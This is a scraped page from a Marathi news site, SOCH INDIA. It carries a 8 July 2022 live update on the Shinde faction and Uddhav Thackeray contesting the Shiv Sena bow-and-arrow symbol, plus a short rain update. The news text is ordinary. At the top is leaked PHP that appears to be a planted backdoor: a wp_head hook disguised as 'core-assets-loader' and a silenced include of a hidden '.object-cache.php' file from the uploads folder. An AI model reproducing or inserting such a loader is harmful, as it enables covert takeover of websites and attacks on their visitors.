add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Maharashtra Breaking News Live : धनुष्यबाण चिन्हावरुन उद्धव ठाकरे आणि शिंदे गटात रस्सीखेच, महाराष्ट्रातील महत्त्वाच्या घडामोडी एका क्लिकवर! – SOCH INDIA
Menu

Maharashtra Breaking News Live : धनुष्यबाण चिन्हावरुन उद्धव ठाकरे आणि शिंदे गटात रस्सीखेच, महाराष्ट्रातील महत्त्वाच्या घडामोडी एका क्लिकवर!

nobanner

Mumbai-Maharashtra Heavy Rain Updates, 08 July 2022 : विधिमंडळातील एकनाथ शिंदे यांच्या गटाला विधानसभा अध्यक्षांनी मान्यता दिली असून शिवसेनेचे निवडणूक चिन्ह धनुष्यबाण जाण्याची शक्यता आहे. धनुष्यबाण चिन्हासाठी शिंदे गट आणि उद्धव ठाकरे यांच्यात कायदेशीर लढाई होण्याची शक्यता आहे. तर दुसरीकडे मुख्यमंत्री एकनाथ शिंदे यांच्याकडून माजी मुख्यमंत्री उद्धव ठाकरे यांना धक्के देणे सुरूच आहे. शिवसेनेचा बालेकिल्ला असलेल्या ठाणे जिल्ह्यात शिवसेनेला भगदाड पडल्यानंतर व ६७ पैकी तब्बल ६४ नगरसेवकांनी एकनाथ शिंदे यांना पाठिंबा दर्शवल्यानंतर आता कल्याण-डोंबिवलीतही शिवसेनेला मोठा धक्का बसला आहे. कारण, महापालिकेतील तब्बल ४० माजी नगरसेवक शिंदे गटात सहभागी झाले आहेत.

तर मुख्यमंत्री एकनाथ शिंदे हे आज संध्याकाळी उपमुख्यमंत्री देवेंद्र फडणवीस यांच्यासह दिल्ली दौऱ्यावर जात आहेत. शिंदे यावेळी पंतप्रधान मोदी तसंच गृहमंत्री अमित शाह यांची भेट घेण्याची शक्यता आहे. मंत्रीमंडळ विस्तार आणि खातेवाटप याबाबतही याच दौऱ्यात शिक्कामोर्तब होण्याची शक्यता आहे.
महाराष्ट्रात बहुतेक सर्व ठिकाणी पावसाने हजेरी लावली आहे. कोकण, ठाणे, पालघर इथे पावसाची चांगली हजेरी आहे.